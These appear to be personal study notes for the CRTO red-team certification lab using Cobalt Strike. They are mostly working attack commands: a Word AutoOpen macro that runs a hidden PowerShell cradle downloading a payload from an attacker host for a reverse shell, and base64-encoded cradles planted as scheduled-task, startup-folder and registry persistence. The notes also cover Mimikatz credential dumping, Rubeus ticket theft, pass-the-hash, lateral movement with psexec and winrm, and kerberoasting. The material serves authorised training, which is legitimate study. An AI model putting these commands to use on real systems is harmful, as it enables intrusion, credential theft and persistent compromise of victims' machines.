CRTO & Cobalt Strike

This Page contains all the notes which are required to pass the CRTO Exam and it also contains the lab instructions as well

Setting Up Cobalt Strike on Windows Machine

To start Cobalt Strike We need 2 things

Team Server (This will only be run on the Linux machine)
Cobalt Strike Client

Setting Up TeamServer

First, we need to have a Linux box on which teamserver will run so I already have that, I will open my Linux box on the Windows machine and then run the teamserver

sudo ./teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile

10.10.5.50 is the IP address of the Attacker Linux VM.
Passw0rd! is the shared password used to connect from the Cobalt Strike client.
webbug.profile is an example Malleable C2 profile (covered in more detail later).

Now Teamserver is all good to go so we need to start cobalt strike now

Starting Cobalt Strike Client

Now after the teamserver is started then we need to start the Cobalt Strike Client and provide the details

I added a random Alias
Host Should be the one where Teamserver is Running
You can add any Username
Password should be the same which you selected on the Teamserver

Listeners in Cobalt Strike

We can set up some listeners in cobalt strike by press the headphones button on the top

now we can click the add button at the bottom and then add some listeners, we can set

http
dns
https
smb

below is an example of the HTTP listener

in the same way we can set all the listeners

Smb Listener

For smb listener we can see the pipes on our own system and choose any one of the found, we will not use the cobalt strike default one because that can be easily detected by the AVs.

we can use any of the above and set the listener

All Listeners setup done

Running Cobalt Strike As a Service

We can run cobalt strike as a service so once we start our linux machine we dont need to run teamserver again and again

first we need to create a file in /etc/systemd/system

sudo nano /etc/systemd/system/teamserver.service

then add the following content in it

[Unit]
Description=Cobalt Strike Team Server
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=always
RestartSec=1
User=root
WorkingDirectory=/home/attacker/cobaltstrike
ExecStart=/home/attacker/cobaltstrike/teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile

[Install]
WantedBy=multi-user.target

now we need to reload the system manager

sudo systemctl daemon-reload

now lets see the status of the teamserver service we created

sudo systemctl status teamserver.service

now lets start the teamserver service

sudo systemctl start teamserver.service

and lets enable the teamserver service as well

sudo systemctl enable teamserver.service

now everytime the linux machine starts the teamserver service will run automatically.

Generating All Payloads using Cobalt Strike

We can generate all payload in Cobalt Strike, i will choose the last option Windows Stageless Generate All Payloads

now all the payloads will be generated in the C:\Paylaods

Creating Macro With Cobalt Strike

We can open word and go to View->Macros->Create Macro

Make sure you write the name AutoOpen and select document1 from the drop Down

Now i will write a small code to open notepad

Sub AutoOpen()

  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
  Shell.Run "notepad"

End Sub

then we need to save it and run it and we will see notepad running

Macro For Reverse Shell in Cobalt Strike

Now i will use the Cobalt Strike Scripted Web Delivery to Host a payload and get a reverse shell

now my payload will be hosted and we will get the following command which we can insert in the macro and once the macro

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.50:80/a'))"

below is how the final code will look like, make sure you use 2 double quots to escape

Sub AutoOpen()

  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
  Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://10.10.5.50:80/a'))"""

End Sub

in site management i can see that my payload is hosted and listening on port 80

once someone opens the macro i will get a reverse shell in my cobalt strike

Cobalt Strike Commands

ps ----> to see the processes so we can see the AV or Endpoint Protection Processes
execute-assembly --->  (executable-file) ----> execute-assembly seatbelt.exe -group=system ---> run any exectubale file using this

Screenshots ----> take screenshots

keylogger -----> record what the target is typing

Clipboard ----> this will show us what he has copied to clipboard (not images)

net logons  ----> we will see that which users have logged into the system in the past and currently as well

Persistence Techniques

Persistence is a method of regaining or maintaining access to a compromised machine, without having to exploit the initial compromise steps all over again. Workstations are volatile since users tend to logout or reboot them frequently.

If you've gained initial access through a phishing campaign, it's unlikely you'll be able to do so again if your current Beacon is lost, which could be the end of the engagement. If you're on an assume-breach (or indeed in this lab) and have access to an internal host, the loss of complete access to the environment is less of a concern. However, you may still need to drop one or more persistence mechanisms on hosts you control if your simulated threat would also do so.

Common userland persistence methods include:

HKCU / HKLM Registry Autoruns
Scheduled Tasks
Startup Folder

Cobalt Strike doesn't include any built-in commands specifically for persistence. SharPersist is a Windows persistence toolkit written by FireEye. It's written in C#, so can be executed via execute-assembly.

Persistence using Task Scheduler

The Windows Task Scheduler allows us to create "tasks" that execute on a pre-determined trigger. That trigger could be a time of day, on user-logon, when the computer goes idle, when the computer is locked, or a combination thereof.

i will now first convert the powershell download cradle into base64 so i can get rid of the double quotations and special characters problem

$str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'

[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

Now i will use SharpPersist

execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -n "Updater" -m add -o hourly

i can confirm on the target system as well by going to the task scheduler as well.

Persistence Using Startup Folder

Applications, files and shortcuts within a user's startup folder are launched automatically when they first log in. It's commonly used to bootstrap the user's home environment (set wallpapers, shortcut's etc).

execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -f "UserEnvSetup" -m add

We can go to the startup folder on the target machine to confirm

C:\Users\Programmerboy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

Persistence Using Registry AutoRuns

AutoRun values in HKCU and HKLM allow applications to start on boot. You commonly see these to start native and 3rd party applications such as software updaters, download assistants, driver utilities and so on.

For this we need to uplaod our exe file to the target machine and then set it to run on every boot

execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add

Mimikatz in Cobalt Strike

Cobalt Strike has a built-in version of Mimikatz that we can use to extract various credential types. However, there are some differences with how it behaves in Beacon compared to the console version. Each time you execute Mimikatz in Beacon, it does so in a new temporary process which is then destroyed. This means you can't run two "related" commands, such as:

beacon> mimikatz token::elevate
beacon> mimikatz lsadump::sam

Since CS 4.8, you can chain multiple commands together by separating them with a semi-colon.

beacon> mimikatz token::elevate ; lsadump::sam

The ! elevates Beacon to SYSTEM before running the given command, which is useful in cases where you're running in high-integrity but need to impersonate SYSTEM. In most cases, ! is a direct replacement for token::elevate. For example:

beacon> mimikatz !lsadump::sam

NTLM Hashes

beacon> mimikatz !sekurlsa::logonpasswords

We can alos use shorthand command for this in cobalt strike

logonpasswords

Kerberos Encryption keys

beacon> mimikatz !sekurlsa::ekeys

SAM File

The Security Account Manager (SAM) database holds the NTLM hashes of local accounts only. These can be extracted with the lsadump::sam Mimikatz module. If a common local administrator account is being used with the same password across an entire environment, this can make it very trivial to move laterally.

 beacon> mimikatz !lsadump::sam

Domain Cached Creds

Unfortunately, the hash format is not NTLM so it can't be used with pass the hash. The only viable use for these is to crack them offline.

The lsadump::cache Mimikatz module can extract these from HKLM\SECURITY.

mimikatz !lsadump::cache

To crack these with hashcat, we need to transform them into the expected format. The example hashes page shows us it should be $DCC2$<iterations>#<username>#<hash>.

Extracting Kerberos Tickets

One unfortunate consequence of the aforementioned techniques is that they obtain handles to sensitive resources, which can be audited and logged quite easily. Rubeus is a C# tool designed for Kerberos interaction and abuses, using legitimate Windows APIs.

Its triage command will list all the Kerberos tickets in your current logon session and if elevated, from all logon sessions on the machine.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage

Rubeus' dump command will extract these tickets from memory - but because it uses WinAPIs, it does not need to open suspicious handles to LSASS. If not elevated, we can only pull tickets from our own session. Without any further arguments, Rubeus will extract all tickets possible, but we can be more specific by using the /luid and /service parameters.

For example, if we only wanted the TGT for jking, we can do:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x7049f /service:krbtgt

DCSync

The Directory Replication Service (MS-DRSR) protocol is used to synchronise and replicate Active Directory data between domain controllers. DCSync is a technique which leverages this protocol to extract username and credential data from a DC.

Beacon has a dedicated dcsync command, which calls mimikatz lsadump::dcsync in the background.

Domain Reconnaisance'

Powerview

First we will Import it in the memory

beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1

We can run the following Commands to Enumerate the Domain

To Get Information about the domain

beacon> powershell Get-Domain

Returns the domain controllers for the current or specified domain.

beacon> powershell Get-DomainController | select Forest, Name, OSVersion | fl

Returns all domains for the current forest or the forest specified by -Forest.

beacon> powershell Get-ForestDomain

Returns the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller. Useful for finding information such as the domain password policy.

beacon> powershell Get-DomainPolicyData | select -expand SystemAccess

Return all (or specific) user(s). To only return specific properties, use -Properties. By default, all user objects for the current domain are returned, use -Identity to return a specific user.

beacon> powershell Get-DomainUser -Identity jking -Properties DisplayName, MemberOf | fl

Return all computers or specific computer objects.

beacon> powershell Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName

Search for all organization units (OUs) or specific OU objects.

beacon> powershell Get-DomainOU -Properties Name | sort -Property Name

Return all domain groups or specific domain group objects.

beacon> powershell Get-DomainGroup | where Name -like "*Admins*" | select SamAccountName

Return the members of a specific domain group.

beacon> powershell Get-DomainGroupMember -Identity "Domain Admins" | select MemberDistinguishedName

Return all Group Policy Objects (GPOs) or specific GPO objects. To enumerate all GPOs that are applied to a particular machine, use -ComputerIdentity.

beacon> powershell Get-DomainGPO -Properties DisplayName | sort -Property DisplayName

Returns all GPOs that modify local group membership through Restricted Groups or Group Policy Preferences. You can then manually find which OUs, and by extension which computers, these GPOs apply to.

beacon> powershell Get-DomainGPOLocalGroup | select GPODisplayName, GroupName

Enumerates the machines where a specific domain user/group is a member of a specific local group. This is useful for finding where domain groups have local admin access, which is a more automated way to perform the manual cross-referencing described above.

beacon> powershell Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName | fl

Return all domain trusts for the current or specified domain

beacon> powershell Get-DomainTrust

User Impersonation

Pass The Hash Attack

If we have the NTLM hash of the user we can use cobalt strike to do pass the hash attack, after passing the hash we can easily List the C$ drive of the other computer to see wether we can list those or not.

beacon> pth DEV\jking 59fc0f884922b4ce376051134c71e22c

Pass the Ticket

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /luid:0x798c2c /ticket:doIFuj[...snip...]lDLklP

Lateral Movement

Moving laterally between computers in a domain is important for accessing sensitive information/materials, and obtaining new credentials. Cobalt Strike provides three strategies for executing Beacons/code/commands on remote targets.

The first and most convenient is to use the built-in jump command - the syntax is jump [method] [target] [listener]. Type jump to see a list of methods. This will spawn a Beacon payload on the remote target, and if using a P2P listener, will connect to it automatically.

The second strategy is to use the built-in remote-exec command - the syntax is remote-exec [method] [target] [command]. Type remote-exec to see a list of methods.

Each of these strategies are compatible with the various techniques described in the User Impersonation chapter. For example, you can use pth to impersonate a user and then jump to move laterally.

Remote-exec

beacon> remote-exec winrm web.dev.cyberbotic.io whoami

Jump

beacon> jump winrm64 web.dev.cyberbotic.io smb

beacon> jump psexec64 web.dev.cyberbotic.io smb

beacon> jump psexec_psh web smb

Kerberoasting Using Cobalt Strike

We can use rubeus to find and get the TGS for the kerberoastable Users, below command will find all the kerberoastable users and give us the TGS back

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /simple /nowrap

A much safer approach is to enumerate possible candidates first and roast them selectively. This LDAP query will find domain users who have an SPN set.

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName

Now I can target a specific user for kerberoasting as well, We can roast an individual account the /user paramete

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:mssql_svc /nowrap

AS-REP Roasting Using Cobalt Strike

If a user does not have Kerberos pre-authentication enabled, an AS-REP can be requested for that user, and part of the reply can be cracked offline to recover their plaintext password.

As with kerberoasting, we don't want to asreproast every account in the domain.

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname

We can use the below command with rubeus to do AS-REP Roasting on user squid_svc

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:squid_svc /nowrap

Unconstrained delegation using Cobalt strike

This query will return all computers that are permitted for unconstrained delegation.

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname

Rubeus triage will show all the tickets that are currently cached. TGTs can be identified by the krbtgt service.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage

We can simply extract this TGT and leverage it via a new logon session.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x14794e /nowrap

Microsoft Defender and Bypass

Command to Check malicious File

# In Powershell

Get-MpThreatDetection | Sort-Object InitialDetectionTime | Select-Object -First 5

PreviousPython Code Snippets NextEmail Spoofing

Last updated 10 months ago